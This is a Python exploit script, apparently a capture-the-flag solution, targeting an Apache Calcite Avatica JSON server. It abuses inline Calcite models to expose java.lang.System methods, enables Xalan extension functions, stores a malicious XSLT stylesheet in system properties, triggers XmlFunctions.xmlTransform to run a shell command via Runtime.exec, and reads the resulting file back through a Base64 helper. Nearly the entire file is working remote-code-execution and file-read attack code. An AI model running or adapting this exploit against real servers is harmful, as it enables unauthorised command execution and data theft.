#!/usr/bin/env python3
import base64
import json
import random
import string
import sys
import time

import requests


def die(msg):
    """Report a fatal error on stderr and terminate the script.

    Args:
        msg: Message printed after the ``[-]`` marker.

    Raises:
        SystemExit: Always, with exit status 1.
    """
    line = f"[-] {msg}"
    print(line, file=sys.stderr)
    raise SystemExit(1)


def enc(obj):
    """Serialize *obj* to compact JSON, aborting if it exceeds 280 bytes.

    Args:
        obj: Any JSON-serializable object.

    Returns:
        The JSON text with no whitespace after separators.

    Exits the script via ``die`` when the UTF-8 encoding is over 280 bytes.
    """
    text = json.dumps(obj, separators=(",", ":"))
    size = len(text.encode())
    if size <= 280:
        return text
    die(f"request too long: {size} bytes: {text}")


class Avatica:
    """Minimal client for the Avatica JSON-over-HTTP protocol.

    Every call POSTs one JSON request (serialized and size-checked by
    ``enc``) to the server root and returns the decoded JSON reply. Fatal
    conditions are reported through ``die``.
    """

    def __init__(self, base_url):
        """Create a client for *base_url*.

        Args:
            base_url: Server URL; it is normalized to end in exactly one ``/``.
        """
        self.url = base_url.rstrip("/") + "/"
        # A single Session is reused for every request this client sends.
        self.session = requests.Session()

    def post(self, obj, quiet=False):
        """POST *obj* as a JSON request and return the decoded JSON reply.

        Args:
            obj: JSON-serializable request object. It must encode to at
                most 280 bytes, which ``enc`` enforces.
            quiet: When true, suppress the request/response trace lines.

        Returns:
            The parsed JSON body of the response.

        Exits the script via ``die`` if the response body is not valid JSON.
        """
        data = enc(obj)
        r = self.session.post(
            self.url,
            data=data,
            headers={"Content-Type": "application/json"},
            timeout=10,
        )
        if not quiet:
            print(f"[>] {len(data):3d} {data}")
            # Truncate and flatten the body so each trace stays on one line.
            print(f"[<] {r.status_code} {r.text[:220].replace(chr(10), ' ')}")
        try:
            return r.json()
        except ValueError:
            # requests' JSON decode errors subclass ValueError in all versions.
            # Catching only that avoids masking unrelated failures.
            die(f"non-json response {r.status_code}: {r.text[:500]}")

    def open_calcite(self, cid, model):
        """Open connection *cid* whose JDBC URL embeds *model* inline.

        Args:
            cid: Connection id to register on the server.
            model: Calcite model text appended after ``model=inline:``.

        Returns:
            The decoded ``openConnection`` reply.
        """
        return self.post({
            "request": "openConnection",
            "connectionId": cid,
            "info": {"jdbcUrl": "jdbc:calcite:model=inline:" + model},
        })

    def stmt(self, cid):
        """Create a statement on connection *cid* and return its id.

        Exits the script via ``die`` if the reply carries no ``statementId``.
        """
        j = self.post({"request": "createStatement", "connectionId": cid})
        if "statementId" not in j:
            die(f"createStatement failed: {j}")
        return j["statementId"]

    def q(self, sid, sql, quiet=False):
        """Run *sql* on statement *sid* via ``prepareAndExecute``.

        At most one row is requested in the first result frame.

        Args:
            sid: Statement id returned by ``stmt``.
            sql: SQL text to execute.
            quiet: Passed through to ``post`` to suppress tracing.

        Returns:
            The decoded ``prepareAndExecute`` reply.
        """
        return self.post({
            "request": "prepareAndExecute",
            "statementId": sid,
            "sql": sql,
            "maxRowsInFirstFrame": 1,
        }, quiet=quiet)


def sql_string(s: str) -> str:
    """Return *s* as a single-quoted SQL string literal.

    Embedded single quotes are escaped by doubling them.
    """
    escaped = s.replace("'", "''")
    return f"'{escaped}'"


def rand_cid(prefix):
    """Return *prefix* followed by one random ASCII letter.

    The suffix is a single character, which gives only 52 distinct ids per
    prefix. Presumably this is to keep requests short under ``enc``'s
    280-byte cap.
    """
    suffix = random.choice(string.ascii_letters)
    return prefix + suffix


def main():
    """Command-line entry point: ``script URL [outfile]``.

    Runs three phases over separate Avatica connections:

    1. Through ``java.lang.System`` functions, set
       ``jdk.xml.enableExtensionFunctions`` and stash an XSLT stylesheet in
       system properties ``a``, ``b``, ... .
    2. Call ``XmlFunctions.xmlTransform`` with that stylesheet. The stylesheet
       invokes ``Runtime.exec`` on ``sh -c /readflag><outfile>``.
    3. Poll the output file through Avatica's ``Base64.encodeFromFile``, then
       decode and print its contents.

    ``outfile`` defaults to ``/tmp/o``. The function exits via ``die`` /
    ``sys.exit`` on failure.
    """
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} http://host:port/ [outfile]", file=sys.stderr)
        sys.exit(1)

    target = sys.argv[1]
    out_file = sys.argv[2] if len(sys.argv) > 2 else "/tmp/o"
    a = Avatica(target)

    # 1) Enable Xalan Java extension functions and store XSLT in System properties.
    cid = rand_cid("s")
    # Expose every java.lang.System method under schema "s" (e.g. s.setProperty).
    sys_model = 'version: 1\nschemas: [{name: s,functions: [{className: java.lang.System,methodName: "*"}]}]'
    a.open_calcite(cid, sys_model)
    sid = a.stmt(cid)
    a.q(sid, "select s.setProperty('jdk.xml.enableExtensionFunctions','true')")

    # NOTE(review): out_file is spliced into the command unquoted.
    # Whitespace or shell metacharacters in it will change the command.
    cmd = f"sh -c /readflag>{out_file}"
    xslt = (
        '<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" '
        'xmlns:r="xalan://java.lang.Runtime" version="1">'
        '<template match="/"><value-of select="r:exec(r:getRuntime(),\''
        + cmd +
        '\')"/></template></stylesheet>'
    )
    # Store the stylesheet in 150-char pieces. Presumably this keeps each
    # setProperty request under enc()'s 280-byte limit.
    # Keys are 'a', 'b', ...; anything past 26 chunks would leave a-z.
    chunks = [xslt[i:i + 150] for i in range(0, len(xslt), 150)]
    for i, chunk in enumerate(chunks):
        key = chr(ord('a') + i)
        a.q(sid, f"select s.setProperty('{key}',{sql_string(chunk)})")

    # 2) Trigger XmlFunctions.xmlTransform; the stylesheet runs
    # Runtime.exec("sh -c /readflag><out_file>"), where out_file defaults to /tmp/o.
    cid = rand_cid("x")
    xml_model = (
        'version: 1\nschemas: [{name: s,functions: ['
        '{className: java.lang.System,methodName: "*"},'
        '{className: org.apache.calcite.runtime.XmlFunctions,methodName: xmlTransform}]}]'
    )
    a.open_calcite(cid, xml_model)
    sid = a.stmt(cid)
    # Rebuild the stylesheet server-side by concatenating the stored
    # properties in key order: s.getProperty('a')||s.getProperty('b')||...
    expr = "||".join(f"s.getProperty('{chr(ord('a') + i)}')" for i in range(len(chunks)))
    a.q(sid, f"select s.xmlTransform('<a/>',{expr})")

    # 3) Read the redirected flag file through Avatica Base64 helper.
    cid = rand_cid("b")
    b64_model = 'version: 1\nschemas: [{name: s,functions: [{className: org.apache.calcite.avatica.util.Base64,methodName: "*"}]}]'
    a.open_calcite(cid, b64_model)
    sid = a.stmt(cid)

    # Poll up to 10 times, 0.3 s apart. Presumably the command may not have
    # finished writing the file when step 2's request returns.
    # NOTE(review): out_file is not escaped with sql_string here.
    # A path containing a quote would break this query.
    last = None
    for _ in range(10):
        time.sleep(0.3)
        j = a.q(sid, f"select s.encodeFromFile('{out_file}')", quiet=True)
        last = j
        try:
            rows = j["results"][0]["firstFrame"]["rows"]
            # The first cell holds the file's Base64 contents when the read succeeded.
            if rows and rows[0] and rows[0][0]:
                flag = base64.b64decode(rows[0][0]).decode(errors="replace")
                print("\n[+] FLAG / output:")
                print(flag)
                return
        except Exception:
            # Replies without the expected result shape (e.g. errors) are
            # skipped so the poll can retry.
            pass
    die(f"could not read output file; last response: {last}")


if __name__ == "__main__":
    # Run only when executed as a script, not when imported.
    main()
